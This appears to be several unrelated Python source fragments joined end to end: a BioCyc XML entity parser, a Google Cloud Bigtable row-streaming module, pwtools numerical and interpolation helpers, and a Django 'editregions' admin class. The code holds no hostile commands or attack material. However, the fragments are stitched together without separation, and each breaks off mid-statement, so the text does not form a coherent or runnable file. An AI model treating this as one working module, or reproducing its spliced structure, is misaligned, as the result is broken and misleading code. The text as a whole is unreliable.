xml.iterfind('synonym') for e in es: self.synonyms.append(e.text) if self.name is None and self.synonyms: self.name_as_html = self.synonyms[-1] # Apply last synonym if common name not defined self.name = to_plain_text(self.name_as_html) def _import_dblinks(self, xml): es = xml.iterfind('dblink') for e in es: #<dblink-db>LIGAND-CPD</dblink-db><dblink-oid>C00186</dblink-oid> self.dblinks[ e.find('dblink-db').text ] = e.find('dblink-oid').text def _import_inchi(self, xml): self._set_var_from_xml_text( xml, 'inchi', 'inchi') def _import_molecular_weight(self, xml): self._set_var_from_xml_text( xml, 'molecular-weight', 'molecular_weight') def _import_gibbs0(self, xml): self._set_var_from_xml_text( xml, 'gibbs-0', 'gibbs0' ) def _import_reactions(self, xml): self._set_list_ids_from_xml_iter(xml, 'appears-in-right-side-of/Reaction', 'reactions_in_right') self._set_list_ids_from_xml_iter(xml, 'appears-in-left-side-of/Reaction', 'reactions_in_left') def _import_reaction_list(self, xml): self._set_list_ids_from_xml_iter(xml, 'reaction-list/Reaction', '_reactions') def _import_super_pathways(self, xml): self._set_list_ids_from_xml_iter(xml, 'super-pathways/Pathway', '_super_pathways') def _import_pathways(self, xml): self._set_list_ids_from_xml_iter(xml, 'in-pathway/Pathway', '_pathways') def _import_species(self, xml): self._set_list_ids_from_xml_iter(xml, 'species/Organism', '_species') def _import_taxonomic_range(self, xml): self._set_list_ids_from_xml_iter(xml, 'taxonomic-range/Organism', '_taxonomic_range') def _set_var_from_xml_text(self, xml, xmlpath, var): ''' Sets a object variable from the xml if it is there and passing it through a data conversion based on the variable datatype ''' xmle = xml.find(xmlpath) if xmle is not None: setattr(self, var, type_converter[ xmle.attrib.get('datatype', 'string') ]( xmle.text )) def _set_list_ids_from_xml_iter(self, xml, xmlpath, var): ''' Set a list variable from the frameids of matching xml entities ''' es = xml.iterfind(xmlpath) if es is not None: l = [] for e in es: l.append( e.attrib['frameid'] ) setattr(self, var, l) def _set_id_from_xml_frameid(self, xml, xmlpath, var): ''' Set a single variable with the frameids of matching entity ''' e = xml.find(xmlpath) if e is not None: setattr(self, var, e.attrib['frameid']) @property def parents(self): return biocyc.get_for_org( self.org_id, self._parents ) @property def instances(self): return biocyc.get_for_org( self.org_id, self._instances ) @property def dblinks_link_html(self): db = {} for k,v in self.dblinks.items(): if k in DBLINK_URLS: db[k] = '<a href="%s">%s</a>' % (DBLINK_URLS[k] % v,v) else: db[k] = v return db @property def biocyc_link_html(self): return '<a href="%s">%s</a>' % (biocyc.biocyc_obj_url(self.id), self.id ) class Compound(BioCycEntityBase): xml_schema_id = 'Compound' localstore = 'compounds' def __init__(self, *args, **kwargs): self.inchi = '' self.molecular_weight = None self.gibbs0 = None self.reactions_in_right = [] self.reactions_in_left = [] super(Compound, self).__init__(*args, **kwargs) def import_from_xml(self, xml): super(Compound, self).import_from_xml(xml) self._import_inchi(xml) self._import_molecular_weight(xml) self._import_gibbs0(xml) self._import_reactions(xml) @property def _reactions(self): return self.reactions_in_right + self.reactions_in_left @property def reactions(self): return biocyc.get_for_org( self.org_id, self._reactions ) @property def pathways(self): return [p for r in self.reactions for p in r.pathways] class Pathway(BioCycEntityBase): xml_schema_id = 'Pathway' localstore = 'pathways' def __init__(self, *args, **kwargs): self._parent = None self._reactions = [] self._species = [] self._super_pathways = [] self._instances = [] self._subclasses = [] self._taxonomic_range = [] super(Pathway, self).__init__(*args, **kwargs) def import_from_xml(self, xml): super(Pathway, self).import_from_xml(xml) self._import_parent(xml) self._import_instances(xml) self._import_subclasses(xml) self._import_reaction_list(xml) self._import_species(xml) self._import_super_pathways(xml) self._import_taxonomic_range(xml) @property def parent(self): return biocyc.get_for_org( self.org_id, self._parent ) @property def instances(self): return biocyc.get_for_org( self.org_id, self._instances ) @property def subclasses(self): return biocyc.get_for_org( self.org_id, self._subclasses ) @property def compounds(self): return [c for r in clean(self.reactions) for c in clean(r.compounds)] @property def reactions(self): return biocyc.get_for_org( self.org_id, self._reactions ) @property def species(self): return biocyc.get_for_org( self.org_id, self._species ) @property def super_pathways(self): return biocyc.get_for_org( self.org_id, self._super_pathways ) @property def taxonomic_range(self): return biocyc.get_for_org( self.org_id, self._taxonomic_range ) def _import_parent(self, xml): self._set_id_from_xml_frameid(xml, 'parent/Pathway', '_parent') def _import_instances(self, xml): self._set_list_ids_from_xml_iter(xml, 'instance/Pathway', '_instances') def _import_subclasses(self, xml): self._set_list_ids_from_xml_iter(xml, 'subclass/Pathway', '_subclasses') class Reaction(BioCycEntityBase): xml_schema_id = 'Reaction' localstore = 'reactions' def __init__(self, *args, **kwargs): self._pathways = [] self._compounds_left = [] self._compounds_right = [] self._enzymatic_reactions = [] super(Reaction, self).__init__(*args, **kwargs) def import_from_xml(self, xml): super(Reaction, self).import_from_xml(xml) self._import_enzymatic_reaction_objects(xml) self._import_pathways(xml) self._import_compounds_left(xml) self._import_compounds_right(xml) self._import_reaction_direction(xml) @property def compounds_left(self): return biocyc.get_for_org( self.org_id, self._compounds_left ) @property def compounds_right(self): return biocyc.get_for_org( self.org_id, self._compounds_right ) @property def compounds(self): return self.compounds_left + self.compounds_right @property def enzymatic_reactions(self): return biocyc.get_for_org( self.org_id, self._enzymatic_reactions ) @property def enzymes(self): return clean([er.enzyme for er in clean(self.enzymatic_reactions)]) @property def pathways(self): return biocyc.get_for_org( self.org_id, self._pathways ) def _import_enzymatic_reaction_objects(self, xml): # The EnzymaticReaction data in the Reaction XML contains all the information we need # to create an EnzymaticReaction object, despite being detail=low. # Auto-create them here to avoid unnecessary request enzyme_reaction_list = [] for er in xml.iterfind('enzymatic-reaction/Enzymatic-Reaction'): id = er.attrib['frameid'] enzyme_reaction_list.append(id) obj = EnzymaticReaction( id=id, from_xml=er) biocyc.cache(obj) self._enzymatic_reactions = enzyme_reaction_list def _import_compounds_left(self, xml): self._set_list_ids_from_xml_iter(xml, 'left/Compound', '_compounds_left') def _import_compounds_right(self, xml): self._set_list_ids_from_xml_iter(xml, 'right/Compound', '_compounds_right') def _import_reaction_direction(self, xml): self._set_var_from_xml_text( xml, 'reaction-direction', 'direction') class EnzymaticReaction(BioCycEntityBase): xml_schema_id = 'Enzymatic-Reaction' localstore = 'enzymaticreactions' def __init__(self, *args, **kwargs): self._enzyme = None self._reaction = None super(EnzymaticReaction, self).__init__(*args, **kwargs) def import_from_xml(self, xml): super(EnzymaticReaction, self).import_from_xml(xml) self._import_enzyme(xml) self._import_reaction(xml) def _import_enzyme(self, xml): self._set_id_from_xml_frameid(xml, 'enzyme/Protein', '_enzyme') def _import_reaction(self, xml): self._set_id_from_xml_frameid(xml, 'reaction/Reaction', '_reaction') @property def enzyme(self): return biocyc.get_for_org( self.org_id, self._enzyme ) @property def reaction(self): return biocyc.get_for_org( self.org_id, self._reaction ) @property def pathways(self): return self.reaction.pathways class Protein(BioCycEntityBase): xml_schema_id = 'Protein' localstore = 'proteins' def __init__(self, *args, **kwargs): self._parent = None self._gene = None self._location = None self._components = [] # Subunits self._complexes = [] # Subunits of self._catalyzes = [] self.component_coefficient = None super(Protein, self).__init__(*args, **kwargs) def import_from_xml(self, xml): super(Protein, self).import_from_xml(xml) self._import_parent(xml) self._import_gene(xml) self._import_components(xml) self._import_complexes(xml) self._import_enzymatic_reactions(xml) @property def parent(self): return biocyc.get_for_org( self.org_id, self._parent ) @property def gene(self): return biocyc.get_for_org( self.org_id, self._gene ) @property def genes(self): # Including subunits genes = [c.gene for c in clean(self.components)] if self.gene is not None: genes += [self.gene] return genes @property
# Copyright 2016 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Container for Google Cloud Bigtable Cells and Streaming Row Contents.""" import copy import six from google.cloud._helpers import _datetime_from_microseconds from google.cloud._helpers import _to_bytes class Cell(object): """Representation of a Google Cloud Bigtable Cell. :type value: bytes :param value: The value stored in the cell. :type timestamp: :class:`datetime.datetime` :param timestamp: The timestamp when the cell was stored. :type labels: list :param labels: (Optional) List of strings. Labels applied to the cell. """ def __init__(self, value, timestamp, labels=()): self.value = value self.timestamp = timestamp self.labels = list(labels) @classmethod def from_pb(cls, cell_pb): """Create a new cell from a Cell protobuf. :type cell_pb: :class:`._generated.data_pb2.Cell` :param cell_pb: The protobuf to convert. :rtype: :class:`Cell` :returns: The cell corresponding to the protobuf. """ timestamp = _datetime_from_microseconds(cell_pb.timestamp_micros) if cell_pb.labels: return cls(cell_pb.value, timestamp, labels=cell_pb.labels) else: return cls(cell_pb.value, timestamp) def __eq__(self, other): if not isinstance(other, self.__class__): return False return (other.value == self.value and other.timestamp == self.timestamp and other.labels == self.labels) def __ne__(self, other): return not self.__eq__(other) class PartialCellData(object): """Representation of partial cell in a Google Cloud Bigtable Table. These are expected to be updated directly from a :class:`._generated.bigtable_service_messages_pb2.ReadRowsResponse` :type row_key: bytes :param row_key: The key for the row holding the (partial) cell. :type family_name: str :param family_name: The family name of the (partial) cell. :type qualifier: bytes :param qualifier: The column qualifier of the (partial) cell. :type timestamp_micros: int :param timestamp_micros: The timestamp (in microsecods) of the (partial) cell. :type labels: list of str :param labels: labels assigned to the (partial) cell :type value: bytes :param value: The (accumulated) value of the (partial) cell. """ def __init__(self, row_key, family_name, qualifier, timestamp_micros, labels=(), value=b''): self.row_key = row_key self.family_name = family_name self.qualifier = qualifier self.timestamp_micros = timestamp_micros self.labels = labels self.value = value def append_value(self, value): """Append bytes from a new chunk to value. :type value: bytes :param value: bytes to append """ self.value += value class PartialRowData(object): """Representation of partial row in a Google Cloud Bigtable Table. These are expected to be updated directly from a :class:`._generated.bigtable_service_messages_pb2.ReadRowsResponse` :type row_key: bytes :param row_key: The key for the row holding the (partial) data. """ def __init__(self, row_key): self._row_key = row_key self._cells = {} def __eq__(self, other): if not isinstance(other, self.__class__): return False return (other._row_key == self._row_key and other._cells == self._cells) def __ne__(self, other): return not self.__eq__(other) def to_dict(self): """Convert the cells to a dictionary. This is intended to be used with HappyBase, so the column family and column qualiers are combined (with ``:``). :rtype: dict :returns: Dictionary containing all the data in the cells of this row. """ result = {} for column_family_id, columns in six.iteritems(self._cells): for column_qual, cells in six.iteritems(columns): key = (_to_bytes(column_family_id) + b':' + _to_bytes(column_qual)) result[key] = cells return result @property def cells(self): """Property returning all the cells accumulated on this partial row. :rtype: dict :returns: Dictionary of the :class:`Cell` objects accumulated. This dictionary has two-levels of keys (first for column families and second for column names/qualifiers within a family). For a given column, a list of :class:`Cell` objects is stored. """ return copy.deepcopy(self._cells) @property def row_key(self): """Getter for the current (partial) row's key. :rtype: bytes :returns: The current (partial) row's key. """ return self._row_key class InvalidReadRowsResponse(RuntimeError): """Exception raised to to invalid response data from back-end.""" class InvalidChunk(RuntimeError): """Exception raised to to invalid chunk data from back-end.""" class PartialRowsData(object): """Convenience wrapper for consuming a ``ReadRows`` streaming response. :type response_iterator: :class:`~google.cloud.exceptions.GrpcRendezvous` :param response_iterator: A streaming iterator returned from a ``ReadRows`` request. """ START = "Start" # No responses yet processed. NEW_ROW = "New row" # No cells yet complete for row ROW_IN_PROGRESS = "Row in progress" # Some cells complete for row CELL_IN_PROGRESS = "Cell in progress" # Incomplete cell for row def __init__(self, response_iterator): self._response_iterator = response_iterator # Fully-processed rows, keyed by `row_key` self._rows = {} # Counter for responses pulled from iterator self._counter = 0 # Maybe cached from previous response self._last_scanned_row_key = None # In-progress row, unset until first response, after commit/reset self._row = None # Last complete row, unset until first commit self._previous_row = None # In-progress cell, unset until first response, after completion self._cell = None # Last complete cell, unset until first completion, after new row self._previous_cell = None def __eq__(self, other): if not isinstance(other, self.__class__): return False return other._response_iterator == self._response_iterator def __ne__(self, other): return not self.__eq__(other) @property def state(self): """State machine state. :rtype: str :returns: name of state corresponding to currrent row / chunk processing. """ if self._last_scanned_row_key is None: return self.START if self._row is None: assert self._cell is None assert self._previous_cell is None return self.NEW_ROW if self._cell is not None: return self.CELL_IN_PROGRESS if self._previous_cell is not None: return self.ROW_IN_PROGRESS return self.NEW_ROW # row added, no chunk yet processed @property def rows(self): """Property returning all rows accumulated from the stream. :rtype: dict :returns: row_key -> :class:`PartialRowData`. """ # NOTE: To avoid duplicating large objects, this is just the # mutable private data. return self._rows def cancel(self): """Cancels the iterator, closing the stream.""" self._response_iterator.cancel() def consume_next(self): """Consume the next ``ReadRowsResponse`` from the stream. Parse the response and its chunks into a new/existing row in :attr:`_rows` """ response = six.next(self._response_iterator) self._counter += 1 if self._last_scanned_row_key is None: # first response if response.last_scanned_row_key: raise InvalidReadRowsResponse() self._last_scanned_row_key = response.last_scanned_row_key row = self._row cell = self._cell for chunk in response.chunks: self._validate_chunk(chunk) if chunk.reset_row: row = self._row = None cell = self._cell = self._previous_cell = None continue if row is None: row = self._row = PartialRowData(chunk.row_key) if cell is None: cell = self._cell = PartialCellData( chunk.row_key, chunk.family_name.value, chunk.qualifier.value, chunk.timestamp_micros, chunk.labels, chunk.value) self._copy_from_previous(cell) else: cell.append_value(chunk.value) if chunk.commit_row: self._save_current_row() row = cell = None continue if chunk.value_size == 0: self._save_current_cell() cell = None def consume_all(self, max_loops=None): """Consume the streamed responses until there are no more. This simply calls :meth:`consume_next` until there are no more to consume. :type max_loops: int :param max_loops: (Optional) Maximum number of times to try to consume an additional ``ReadRowsResponse``. You can use this to avoid long wait times. """ curr_loop = 0 if max_loops is None: max_loops = float('inf') while curr_loop < max_loops: curr_loop += 1 try: self.consume_next() except StopIteration: break @staticmethod def _validate_chunk_status(chunk): """Helper for :meth:`_validate_chunk_row_in_progress`, etc.""" # No reseet with other keys if chunk.reset_row: _raise_if(chunk.row_key) _raise_if(chunk.HasField('family_name')) _raise_if(chunk.HasField('qualifier')) _raise_if(chunk.timestamp_micros) _raise_if(chunk.labels) _raise_if(chunk.value_size) _raise_if(chunk.value) # No commit with value size _raise_if(chunk.commit_row and chunk.value_size > 0) # No negative value_size (inferred as a general constraint). _raise_if(chunk.value_size < 0) def _validate_chunk_new_row(self, chunk): """Helper for :meth:`_validate_chunk`.""" assert self.state == self.NEW_ROW _raise_if(chunk.reset_row) _raise_if(not chunk.row_key) _raise_if(not chunk.family_name) _raise_if(not chunk.qualifier) # This constraint is not enforced in the Go example. _raise_if(chunk.value_size > 0 and chunk.commit_row is not False) # This constraint is from the Go example, not the spec. _raise_if(self._previous_row is not None and chunk.row_key <= self._previous_row.row_key) def _same_as_previous(self, chunk): """Helper for :meth:`_validate_chunk_row_in_progress`""" previous = self._previous_cell return (chunk.row_key == previous.row_key and chunk.family_name == previous.family_name and chunk.qualifier == previous.qualifier and chunk.labels == previous.labels) def _validate_chunk_row_in_progress(self, chunk): """Helper for :meth:`_validate_chunk`""" assert self.state == self.ROW_IN_PROGRESS self._validate_chunk_status(chunk) _raise_if(chunk.row_key and chunk.row_key != self._row.row_key) _raise_if(chunk.HasField('family_name') and not chunk.HasField('qualifier')) previous = self._previous_cell _raise_if(self._same_as_previous(chunk) and chunk.timestamp_micros <= previous.timestamp_micros) def _validate_chunk_cell_in_progress(self, chunk): """Helper for :meth:`_validate_chunk`""" assert self.state == self.CELL_IN_PROGRESS self._validate_chunk_status(chunk) self._copy_from_current(chunk) def _validate_chunk(self, chunk): """Helper for :meth:`consume_next`.""" if self.state == self.NEW_ROW: self._validate_chunk_new_row(chunk) if self.state == self.ROW_IN_PROGRESS: self._validate_chunk_row_in_progress(chunk) if self.state == self.CELL_IN_PROGRESS: self._validate_chunk_cell_in_progress(chunk) def _save_current_cell(self): """Helper for :meth:`consume_next`.""" row, cell = self._row, self._cell family = row._cells.setdefault(cell.family_name, {}) qualified = family.setdefault(cell.qualifier, []) complete = Cell.from_pb(self._cell) qualified.append(complete) self._cell, self._previous_cell = None, cell def _copy_from_current(self, chunk): """Helper
[1, 1, 1], [2, 2, 2], [3, 3, 3]]) >>> extend_array(a, 3, 1).shape (4, 3) >>> a=arange(4).reshape(2,2) >>> extend_array(a, 3, 0).shape (3, 2, 2) >>> extend_array(a, 3, 1).shape (2, 3, 2) >>> extend_array(a, 3, 2).shape (2, 2, 3) >>> extend_array(a, 3, 2)[...,0] array([[0, 1], [2, 3]]) >>> extend_array(a, 3, 2)[...,1] array([[0, 1], [2, 3]]) >>> extend_array(a, 3, 2)[...,2] array([[0, 1], [2, 3]]) See Also -------- :func:`numpy.repeat` """ # XXX Make more effective by using stride_tricks, see # http://thread.gmane.org/gmane.comp.python.numeric.general/48096 . # Test if this survives pickle / unpickle. Probably not. # # Also, maybe add attr 'extended' to tha array. setattr() doesn't work, # however. # # (3,3) -> max_axis = 2 max_axis = arr.ndim assert -1 <= axis <= max_axis, "axis out of bound" sl = [slice(None)]*(max_axis + 1) # e.g: [:,:,np.newaxis,...] sl[axis] = None return np.repeat(arr[tuple(sl)], nstep, axis=axis) def sum(arr, axis=None, keepdims=False, **kwds): """This numpy.sum() with some features implemented which can be found in numpy v1.7 and later: `axis` can be a tuple to select arbitrary axes to sum over. We also have a `keepdims` keyword, which however works completely different from numpy. Docstrings shamelessly stolen from numpy and adapted here and there. Parameters ---------- arr : nd array axis : None or int or tuple of ints, optional Axis or axes along which a sum is performed. The default (`axis` = `None`) is to perform a sum over all the dimensions of the input array. `axis` may be negative, in which case it counts from the last to the first axis. If this is a tuple of ints, a sum is performed on multiple axes, instead of a single axis or all the axes as before. keepdims : bool, optional If this is set to True, the axes from `axis` are left in the result and the reduction (sum) is performed for all remaining axes. Therefore, it reverses the `axis` to be summed over. **kwds : passed to np.sum(). Examples -------- >>> a=rand(2,3,4) >>> num.sum(a) 12.073636268676152 >>> a.sum() 12.073636268676152 >>> num.sum(a, axis=1).shape (2, 4) >>> num.sum(a, axis=(1,)).shape (2, 4) >>> # same as axis=1, i.e. it inverts the axis over which we sum >>> num.sum(a, axis=(0,2), keepdims=True).shape (2, 4) >>> # numpy's keepdims has another meaning: it leave the summed axis (0,2) >>> # as dimension of size 1 to allow broadcasting >>> numpy.sum(a, axis=(0,2), keepdims=True).shape (1, 3, 1) >>> num.sum(a, axis=(1,)) - num.sum(a, axis=1) array([[ 0., 0., 0., 0.], [ 0., 0., 0., 0.]]) >>> num.sum(a, axis=(0,2)).shape (3,) >>> num.sum(a, axis=(0,2)) - a.sum(axis=0).sum(axis=1) array([ 0., 0., 0.]) """ # Recursion rocks! def _sum(arr, tosum): if len(tosum) > 0: # Choose axis to sum over, remove from list w/ remaining axes. axis = tosum.pop(0) _arr = arr.sum(axis=axis) # arr has one dim less now. Rename remaining axes accordingly. _tosum = [xx-1 if xx > axis else xx for xx in tosum] return _sum(_arr, _tosum) else: return arr axis_is_int = isinstance(axis, int) if (axis is None): if keepdims: raise Exception("axis=None + keepdims=True makes no sense") else: return np.sum(arr, axis=axis, **kwds) elif axis_is_int and not keepdims: return np.sum(arr, axis=axis, **kwds) else: if axis_is_int: tosum = [axis] elif isinstance(axis, tuple) or \ isinstance(axis, list): tosum = list(axis) else: raise Exception("illegal type for axis: %s" %str(type(axis))) if keepdims: alldims = range(arr.ndim) tosum = [xx for xx in alldims if xx not in tosum] return _sum(arr, tosum) class Interpol2D: """Common 2D interpolator API. The API is the same as in ``scipy.interpolate``, e.g. >>> inter = scipy.interpolate.SomeInterpolatorClass(points, values) >>> new_values = inter(new_points) This is for easy testing of multiple interpolators on a surface z = f(x,y), which is given as an unordered set of points. """ def __init__(self, points=None, values=None, xx=None, yy=None, dd=None, what='rbf_inv_multi', **initkwds): """ Parameters ---------- points : (npoints, 2) values : (npoints, 1) xx,yy : (npoints, 1) Use either `points` + `values` or `xx` + `yy` + `values` or `dd`. dd : pwtools.mpl.Data2D instance what : str, optional which interpolator to use | 'rbf_multi' : RBFN w/ multiquadric rbf, see :class:`~pwtools.rbf.Rbf` | 'rbf_inv_multi' : RBFN w/ inverse multiquadric rbf | 'rbf_gauss' : RBFN w/ gaussian rbf | 'poly' : :class:`PolyFit` | 'bispl' : scipy.interpolate.bispl{rep,ev} | 'ct' : scipy.interpolate.CloughTocher2DInterpolator | 'linear' : scipy.interpolate.LinearNDInterpolator | 'nearest' : scipy.interpolate.NearestNDInterpolator **initkwds : keywords passed on to the interpolator's constructor or fit() method (RBF case) Notes ----- Despite the name "Interpol2D", the RBF methods 'rbf_*' as well as 'poly' are actually fits (least squares regression). You can force interpolation with the RBF methods using the ``r=0`` keyword (see :meth:`pwtools.rbf.Rbf.fit`), which will use ``scipy.linalg.solve`` without regularization. The methods 'ct', 'linear' and of course 'nearest' can be inaccurate (see also ``test/test_interpol.py``). Use only for plotting, not for data evaluation, i.e. accurate minimas etc. Except for 'bispl', all interpolators do actually work in ND as well, as does :meth:`get_min`. Possible keywords (examples): | rbf : | p='mean' [,r=None] (default) # linalg.lstsq | p='scipy', r=1e-8 # linalg.solve w/ regularization | p=3.5, r=0 # linalg.solve w/o regularization | ct : | tol = 1e-6 (default) | bispl : | s = 1e-4 | kx = 3, ky = 3 (default) | nxest, nyest | poly : | deg = 5 Examples -------- >>> from pwtools import num, mpl >>> x=linspace(-5,5,20) >>> y=x >>> X,Y=np.meshgrid(x,y); X=X.T; Y=Y.T >>> Z=(X+3)**2+(Y+4)**2 + 5 >>> dd=mpl.Data2D(X=X,Y=Y,Z=Z) >>> fmt="what: {:15} target: [5,30] result: {}" >>> for method in ['rbf_multi', 'rbf_inv_multi', ... 'rbf_gauss', ('poly', {'deg': 5}), ... 'ct', 'bispl', 'linear', 'nearest']: ... if isinstance(method, tuple): ... what = method[0] ... kwds = method[1] ... else: ... what = method ... kwds = {} ... inter=num.Interpol2D(dd=dd, what=what, **kwds) ... print(fmt.format(what, inter([[-3,-4],[0,0]]))) what: rbf_multi target: [5,30] result: [ 5.00000005 29.99999959] what: rbf_inv_multi target: [5,30] result: [ 4.99999808 29.99999798] what: rbf_gauss target: [5,30] result: [ 5.00000051 30.00000352] what: poly target: [5,30] result: [ 5. 30.] what: ct target: [5,30] result: [ 4.99762256 30.010856 ] what: bispl target: [5,30] result: [ 5. 30.] what: linear target: [5,30] result: [ 5.06925208 30.13850416] what: nearest target: [5,30] result: [ 5.01385042 33.82271468] """ if dd is None: if xx is None and yy is None: self.xx = points[:,0] self.yy = points[:,1] self.points = points elif points is None: self.xx = xx self.yy = yy self.points = np.array([xx,yy]).T else: raise Exception("use points+values or xx+yy+values as input") self.values = values else: self.xx, self.yy, self.values, self.points = dd.xx, dd.yy, dd.zz, dd.XY # need to import here b/c of circular dependency rbf.py <-> num.py from pwtools import rbf if what == 'rbf_multi': self.inter = rbf.Rbf(self.points, self.values, rbf='multi', **initkwds) self.call = self.inter elif what == 'rbf_inv_multi': self.inter = rbf.Rbf(self.points, self.values, rbf='inv_multi', **initkwds) self.call = self.inter elif what == 'rbf_gauss': self.inter = rbf.Rbf(self.points, self.values, rbf='gauss', **initkwds) self.call = self.inter elif what == 'poly': self.inter = PolyFit(self.points, self.values, scale=True, **initkwds) self.call = self.inter self.call = self._poly_format_return elif what == 'ct': if CloughTocher2DInterpolator is None: raise ImportError("could not import " "scipy.interpolate.CloughTocher2DInterpolator") else: self.inter = CloughTocher2DInterpolator(self.points, self.values, **initkwds) self.call = self.inter elif what == 'nearest': if NearestNDInterpolator is None: raise ImportError("could not import " "scipy.interpolate.NearestNDInterpolator") else: self.inter = NearestNDInterpolator(self.points, self.values, **initkwds) self.call = self.inter elif what == 'linear': if LinearNDInterpolator is None: raise ImportError("could not import " "scipy.interpolate.LinearNDInterpolator") else: self.inter = LinearNDInterpolator(self.points, self.values, **initkwds) self.call = self.inter elif what == 'bispl': nx = min(len(np.unique(self.xx)), int(sqrt(len(self.xx)))) ny = min(len(np.unique(self.yy)), int(sqrt(len(self.yy)))) _initkwds = {'kx': 3, 'ky': 3, 'nxest': 10*nx, 'nyest': 10*ny} _initkwds.update(initkwds) bispl = bisplrep(self.xx, self.yy, self.values, **_initkwds) def _call(points, bispl=bispl, **callkwds): # For unordered points, we need to loop. ret = [bisplev(points[ii,0], points[ii,1], bispl, **callkwds) for ii in range(points.shape[0])] return np.array(ret) self.inter = _call self.call = _call else: raise Exception("unknown interpolator type: %s" %what) # See pwtools.test.test_polyfit.test_api: work around subtle PolyFit API # difference to all other interpolators w/o breaking neither Interpol2D's # nor PolyFit's API def _poly_format_return(self, *args, **kwds): return np.atleast_1d(self.inter(*args, **kwds)) def __call__(self, points,
<filename>editregions/admin/modeladmins.py # -*- coding: utf-8 -*- from __future__ import unicode_literals from functools import update_wrapper import logging from django.conf import settings from django.utils.html import strip_tags try: from django.utils.six.moves import urllib_parse urlsplit = urllib_parse.urlsplit urlunsplit = urllib_parse.urlunsplit except (ImportError, AttributeError) as e: # Python 2, < Django 1.5 from urlparse import urlsplit, urlunsplit from django.forms import Media from django.template.response import TemplateResponse from adminlinks.admin import AdminlinksMixin from django.contrib.admin.options import ModelAdmin try: from django.contrib.admin.utils import display_for_field, unquote except ImportError: from django.contrib.admin.util import display_for_field, unquote from django.core.exceptions import ObjectDoesNotExist from django.core.urlresolvers import reverse, resolve from django.http import HttpResponse, HttpResponseBadRequest, QueryDict from django.shortcuts import render_to_response from django.template import RequestContext from django.template.loader import render_to_string try: import json except ImportError: # pragma: no cover ... some older Python2 version. from django.utils import simplejson as json try: from django.utils.encoding import force_text except ImportError: # pragma: no cover ... < Django 1.5 from django.utils.encoding import force_unicode as force_text from django.utils.translation import ugettext_lazy as _ from adminlinks.templatetags.utils import _add_link_to_context from editregions.admin.inlines import EditRegionInline from editregions.constants import (REQUEST_VAR_REGION, REQUEST_VAR_CT, REQUEST_VAR_ID) from editregions.utils.data import (get_modeladmin, get_content_type, get_model_class, get_configuration, attach_configuration) from editregions.admin.changelist import EditRegionChangeList from editregions.admin.forms import MovementForm from editregions.admin.utils import (AdminChunkWrapper, shared_media, guard_querystring_m, TemplateRequestKeyValue) from editregions.templatetags.editregion import chunk_iteration_context from editregions.models import EditRegionChunk, EditRegionConfiguration from editregions.text import (admin_chunktype_label, admin_summary_label, admin_position_label, admin_modified_label, region_v) try: from django.utils.text import Truncator def truncate_words(s, num): return Truncator(s).words(num, truncate='...') except ImportError as e: # pragma: no cover from django.utils.text import truncate_words logger = logging.getLogger(__name__) class EditRegionAdmin(ModelAdmin): frontend_editing = True fields = None fieldsets = None exclude = None date_hierarchy = None ordering = None list_select_related = False save_as = False save_on_top = False actions = None change_list_template = 'admin/editregions/change_list.html' list_display = [ # this should always be last, and not be in the list_display_links 'get_object_tools', 'get_subclass_type', 'get_subclass_summary', ] list_display_links = () list_filter = [ 'region', ] def __init__(self, *args, **kwargs): super(EditRegionAdmin, self).__init__(*args, **kwargs) # disables the built in link building using # EditRegionChangeList.url_for_result so that we can have useful # links that we can customise. self.list_display_links = self.get_list_display_links( request=None, list_display=self.list_display, ) def get_list_display_links(self, request, list_display): """ Disable the built in link building so we can have customised links in the changelist. """ return (None,) def get_list_display(self, request): """ A copy of the standard one, hard-copying the fields ... """ return self.list_display[:] def get_changelist_link_html(self, obj, **kwargs): wrapped_obj = AdminChunkWrapper(opts=obj._meta, obj=obj, namespace=self.admin_site.name, content_id=obj.content_id, content_type=obj.content_type, region=obj.region) return ('<a href="{url}" data-adminlinks="autoclose" ' 'class="chunktype-{app}-{model} chunk-metadata-{caller}" ' 'data-no-turbolink>{data}</a>').format( url=wrapped_obj.get_absolute_url(), app=wrapped_obj.url_parts['app'], model=wrapped_obj.url_parts['module'], **kwargs) def get_subclass_type(self, obj): """ get the verbose name of the given object, which is likely a subclass .. note:: By using this callable, we avoid the problem of being able to sort by headers in the changelists (including on the change form) :return: the subclass object's verbose name :rtype: string """ modeladmin = get_modeladmin(obj) if hasattr(modeladmin, 'get_editregions_subclass_type'): value = modeladmin.get_editregions_subclass_type(obj=obj) else: value = obj._meta.verbose_name value = strip_tags(force_text(value)) return self.get_changelist_link_html(obj, data=value, caller='subclass') get_subclass_type.allow_tags = True get_subclass_type.short_description = admin_chunktype_label def get_subclass_summary(self, obj): """ show a brief, HTML aware summary of the content. .. note:: By using this callable, we avoid the problem of being able to sort by headers in the changelists (including on the change form) :return: short representation of the data, HTML included. :rtype: string """ modeladmin = get_modeladmin(obj) if hasattr(modeladmin, 'get_editregions_subclass_summary'): value = modeladmin.get_editregions_subclass_summary(obj=obj) elif hasattr(modeladmin, 'render_into_summary'): context = chunk_iteration_context(index=0, value=obj, iterable=(obj,)) context.update({'admin_summary': True}) value = modeladmin.render_into_summary(obj=obj, context=context) else: value = '[missing]' value = strip_tags(force_text(value)) return self.get_changelist_link_html(obj, data=value, caller='summary') get_subclass_summary.allow_tags = True get_subclass_summary.short_description = admin_summary_label def get_object_tools(self, obj): """ Show the modifiers for this object. Currently just implements the drag handle as per `django-treeadmin`_. :return: the list of actions or tools available for this object :rtype: string """ modeladmin = get_modeladmin(obj) if hasattr(modeladmin, 'get_editregions_subclass_tools'): value = modeladmin.get_editregions_subclass_tools(obj=obj) else: value = '' return '<div class="chunk-object-tools">{value!s}</div>'.format( value=value) get_object_tools.allow_tags = True get_object_tools.short_description = '' # We're finished our list_display fields here. def get_model_perms(self, request, *args, **kwargs): """ Shadow method for the default ModelAdmin. Allows us to hide stufff. By using an empty dictionary, permissions still work, but chunk administration views are hidden from the default AdminSite index. :param request: The WSGIRequest. :return: Empty dictionary """ return {} def get_urls(self): # why this isn't a separate method in Django, I don't know. from django.conf.urls import patterns, url def wrap(view): # pragma: no cover this is from the Django admin def wrapper(*args, **kwargs): return self.admin_site.admin_view(view)(*args, **kwargs) return update_wrapper(wrapper, view) app_label = self.model._meta.app_label if hasattr(self.model._meta, 'model_name'): 